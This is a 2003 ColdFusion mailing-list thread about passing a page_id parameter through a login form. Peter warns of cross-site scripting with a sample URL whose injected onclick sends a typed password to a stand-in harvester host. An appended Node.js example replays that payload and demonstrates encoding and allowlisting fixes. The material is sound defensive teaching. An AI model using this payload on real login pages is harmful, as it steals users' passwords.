Beware of scripting vulnerabilities with the code you are currently writing.

An example URL to extract a user's password: all they would have to do is click on this link (or a short link of it), enter their details on the web site (innocently), and bang! you have stolen their password by collecting it on a remote web site.

http://www.example.com/loggedin/password.cfm?page_id="%20onclick="window.navigate('http://myhome.example.com/pwd_harvester.cfm?pwd='+document.all.entered_password)

Sorry it's not an answer to your question though.

- Peter

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: 23 October 2003 15:43
To: [EMAIL PROTECTED]
Subject: Re: [ cf-dev ] passing stuff around

This really is mindblowing.....

Check user logged in:

<cfif not isdefined("session.loggedin")>
  <cflocation url="loggedin/password.cfm?page_id=individ.cfm">
</cfif>

If they're not, send them off to password.cfm and append the page you came from to the URL. Once at password, set a variable to the passed page details:

<cfset page=#url.page_id#>
<cfoutput>
#page#
</cfoutput>

Use that wicked no-multiple-click thingy from earlier...

<script language="JavaScript">
<!--
function submitForm() {
  document.form_name.clickme.value = "Please Wait...";
  document.form_name.clickme.disabled = "disabled";
  return true;
}
//-->
</script>

The form sends the login to login_action with the page details appended to the URL (I DON'T THINK THIS BIT WORKS):

<form name="form_name" action="login_action.cfm?page_id=#page#" method="post" onsubmit="submitForm();">
  <input type="Password" name="entered_user_name">
  <input type="Password" name="entered_password">
  <input name="clickme" type=submit value="Click Me">
</form>

<cfif isdefined("session.nologin")>
  <cfoutput>
  <font color=red>Incorrect login details. Please try again</font>
  </cfoutput>
</cfif>

Once sent across, check the login details and do the following at login_action. I now have this:

<cfset Page=#url.page_id#>
<cfoutput>
#page#
</cfoutput>
<cfabort>

There's nothing in #page# and the URL parameters show Page_Id as empty..... :(

So what's going on. Can I not pass URL values like this in a form????

Regards
- Paul

*****************************************************************************
The information contained within this e-mail (and any attachment) sent by Birmingham City Council is confidential and may be legally privileged. It is intended only for the named recipient or entity to whom it is addressed. If you are not the intended recipient please accept our apologies and notify the sender immediately, or telephone +(44) 121 303 6666. Unauthorised access, use, disclosure, storage or copying is not permitted and may be unlawful. Any e-mail including its content may be monitored and used by Birmingham City Council for reasons of security and for monitoring internal compliance with the office policy on staff use. E-mail blocking software may also be used. Any views or opinions presented are solely those of the originator and do not necessarily represent those of Birmingham City Council. We cannot guarantee that this message or any attachment is virus free or has not been intercepted and amended.
*****************************************************************************

--
** Archive: http://www.mail-archive.com/dev%40lists.cfdeveloper.co.uk/
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
For human help, e-mail: [EMAIL PROTECTED]
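The attribute break-out in Peter's URL, replayed against a model of Paul's password.cfm form, as an added example that is not code from either post. It is plain Node.js rather than CFML so it can be run anywhere; the three render functions, the attribute extractor and the `HARVEST_PAYLOAD` constant are all hypothetical names introduced here. The payload is the decoded page_id from Peter's URL (ColdFusion's URL scope decodes the %20 before `#page#` is output), and the vulnerable render assumes the `#page#` in the form's action attribute sits inside a `<cfoutput>` block, since outside one ColdFusion does not interpolate it at all. The hardened renders are the two controls a practitioner would add: encoding the value for the attribute and query-string context it lands in, and allowlisting what page_id may contain.

```javascript
// Added example for this thread, not code from either post. It models the
// password.cfm <form> from Paul's message as a string template, replays the
// page_id value from Peter's URL against it, and shows two hardened renders.
// Plain Node.js, no dependencies. All names here are hypothetical.

// Decoded page_id from Peter's URL (ColdFusion's URL scope decodes the %20
// before #page# is output). Constructed for this example.
const HARVEST_PAYLOAD =
  '" onclick="window.navigate(\'http://myhome.example.com/pwd_harvester.cfm?pwd=\'' +
  '+document.all.entered_password)';

// Attributes the template legitimately carries; anything else in the rendered
// tag came from page_id.
const EXPECTED_ATTRS = new Set(['name', 'action', 'method', 'onsubmit']);

// 1. Vulnerable: page_id is concatenated straight into the action attribute.
//    This is Paul's <form action="login_action.cfm?page_id=#page#"> once
//    #page# is actually interpolated (inside a <cfoutput> block).
function renderFormVulnerable(pageId) {
  return `<form name="form_name" action="login_action.cfm?page_id=${pageId}" ` +
         `method="post" onsubmit="submitForm();">`;
}

// Output encoding for the context the value lands in: first as a query-string
// value, then as an HTML attribute value. In ColdFusion this is
// URLEncodedFormat() followed by HTMLEditFormat() (EncodeForHTMLAttribute()
// in later releases).
function encodeForHtmlAttribute(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}
function encodeForActionQuery(pageId) {
  return encodeForHtmlAttribute(encodeURIComponent(pageId));
}

// 2. Encoding only: closes the attribute break-out (no raw quote can reach the
//    markup) but still forwards whatever page_id said, so a later
//    <cflocation url="#url.page_id#"> in login_action.cfm could be steered to
//    an arbitrary target.
function renderFormEncodedOnly(pageId) {
  return `<form name="form_name" action="login_action.cfm?page_id=${encodeForActionQuery(pageId)}" ` +
         `method="post" onsubmit="submitForm();">`;
}

// 3. Allowlist plus encoding: page_id must be a bare .cfm file name (no path,
//    scheme or query); anything else falls back to a known page. Encoding is
//    still applied, because the allowlist is a policy decision and the encoder
//    is what keeps the markup intact if the policy is ever loosened.
const PAGE_ID_RE = /^[A-Za-z0-9_-]+\.cfm$/;
function validatePageId(pageId, fallback = 'index.cfm') {
  return typeof pageId === 'string' && PAGE_ID_RE.test(pageId) ? pageId : fallback;
}
function renderFormHardened(pageId) {
  return renderFormEncodedOnly(validatePageId(pageId));
}

// Crude attribute extractor for the single <form ...> tag these renders emit:
// returns { name: value }. Not a general HTML parser; it only needs to show
// which attributes a browser would see on this one element.
function formAttributes(html) {
  const attrs = {};
  const inner = html.match(/^<form\s+([^>]*)>/)[1];
  for (const m of inner.matchAll(/([A-Za-z_:-]+)="([^"]*)"/g)) attrs[m[1]] = m[2];
  return attrs;
}

// Attribute names present on the rendered tag that the template never wrote.
function injectedAttributes(html) {
  return Object.keys(formAttributes(html)).filter((k) => !EXPECTED_ATTRS.has(k));
}

console.log('vulnerable:', injectedAttributes(renderFormVulnerable(HARVEST_PAYLOAD)));
console.log('encoded   :', injectedAttributes(renderFormEncodedOnly(HARVEST_PAYLOAD)));
console.log('hardened  :', formAttributes(renderFormHardened(HARVEST_PAYLOAD)).action);
```

With the payload, the vulnerable render carries an extra `onclick` attribute and its `action` is cut short at `page_id=`; the encoded render keeps the whole value inside `action` as one harmless string; the hardened render rejects it and falls back to `index.cfm`. The `onsubmit` handler Paul's form legitimately has is why the check compares against the template's expected attribute names rather than looking for any `on*` attribute.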
